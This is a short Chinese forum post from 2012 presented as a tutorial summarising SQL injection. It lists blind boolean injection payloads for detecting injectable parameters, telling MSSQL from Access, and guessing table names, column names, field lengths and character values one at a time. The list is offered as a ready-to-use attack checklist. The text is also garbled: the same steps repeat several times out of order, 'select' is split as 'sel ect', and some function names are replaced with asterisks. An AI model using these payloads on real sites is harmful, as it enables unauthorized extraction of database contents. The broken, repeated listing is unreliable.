edit_note帖子
65
stars积分
3,819
event加入
2011-04-24
电脑网络
[教程]SQL注入小结
schedule发表于 2012-02-05 16:02:00
visibility查看 329
chat_bubble回复 0
#1 楼主
1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是 mssql ;and user>0
3.注入参数是字符‘and [查询条件] and ‘‘=‘
4.搜索时没过滤参数的‘and [查询条件] and ‘%25‘=‘
5.判断 数据库 系统
复制内容到剪贴板 程序代码
;
and (sel ect count(*) from sysobjects)>0 mssql
;
and (sel ect count(*) from msysobjects)>0 access
6.猜数据库 ;and (sel ect Count(*) from [ 数据库 名])>0
7.猜字段 ;and (sel ect Count(字段名)from 数据库 名)>0
1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是 mssql ;and user>0
3.注入参数是字符‘and [查询条件] and ‘‘=‘
4.搜索时没过滤参数的‘and [查询条件] and ‘%25‘=‘
5.判断 数据库 系统
复制内容到剪贴板 程序代码
;
and (sel ect count(*) from sysobjects)>0 mssql
;
and (sel ect count(*) from msysobjects)>0 access
6.猜数据库 ;and (sel ect Count(*) from [ 数据库 名])>0
7.猜字段 ;and (sel ect Count(字段名)from 数据库 名)>0
8.猜字段中记录长度 ;and (sel ect top 1 len(字段名) from 数据库 名)>0
9.(1)猜字段的*值(access)
;and (sel ect top 1 asc(mid(字段名,1,1)) from 数据库 名)>0
(2)猜字段的*值( mssql )
;and (sel ect top 1 *(substring(字段名,1,1)) from 数据库 名)>0
2.初步判断是否是 mssql ;and user>0
3.注入参数是字符‘and [查询条件] and ‘‘=‘
4.搜索时没过滤参数的‘and [查询条件] and ‘%25‘=‘
5.判断 数据库 系统
复制内容到剪贴板 程序代码
;
and (sel ect count(*) from sysobjects)>0 mssql
;
and (sel ect count(*) from msysobjects)>0 access
6.猜数据库 ;and (sel ect Count(*) from [ 数据库 名])>0
7.猜字段 ;and (sel ect Count(字段名)from 数据库 名)>0
1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是 mssql ;and user>0
3.注入参数是字符‘and [查询条件] and ‘‘=‘
4.搜索时没过滤参数的‘and [查询条件] and ‘%25‘=‘
5.判断 数据库 系统
复制内容到剪贴板 程序代码
;
and (sel ect count(*) from sysobjects)>0 mssql
;
and (sel ect count(*) from msysobjects)>0 access
6.猜数据库 ;and (sel ect Count(*) from [ 数据库 名])>0
7.猜字段 ;and (sel ect Count(字段名)from 数据库 名)>0
8.猜字段中记录长度 ;and (sel ect top 1 len(字段名) from 数据库 名)>0
9.(1)猜字段的*值(access)
;and (sel ect top 1 asc(mid(字段名,1,1)) from 数据库 名)>0
(2)猜字段的*值( mssql )
;and (sel ect top 1 *(substring(字段名,1,1)) from 数据库 名)>0
forum
暂无回复,快来抢沙发!
登录 后才能回复
flag举报帖子